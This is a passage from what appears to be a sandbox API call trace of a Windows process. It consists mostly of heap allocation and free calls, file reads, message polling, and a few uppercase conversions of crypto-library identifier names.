RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0111.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0111.281] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0111.281] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x9fc, lpOverlapped=0x0) returned 1 [0111.281] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0111.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0111.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0111.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0111.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0111.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9fc) returned 0x43faa98 [0111.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | out: hHeap=0x1780000) returned 1 [0111.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0111.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0111.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0111.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0111.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9fc) returned 0x43fb4a0 [0111.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43faa98 | out: hHeap=0x1780000) returned 1 [0111.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0111.284] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0111.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0111.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0111.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9fc) returned 0x43faa98 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43faa98 | out: hHeap=0x1780000) returned 1 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0111.285] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0111.285] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0111.285] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0111.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0111.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9fc) returned 0x43faa98 [0111.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0111.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0111.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0111.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ef0 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9fc) returned 0x43fbea8 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0111.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0111.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0111.287] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0111.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0111.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0111.287] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0111.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0111.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0111.287] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0111.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0111.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0111.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ed8 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0111.288] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0111.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0111.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.289] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0111.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.289] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0111.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0111.290] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0111.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2b0 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0111.290] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0111.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0111.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0111.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0111.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0111.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0111.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0111.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0111.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0111.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0111.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0111.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0111.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0111.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0111.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0111.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0111.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 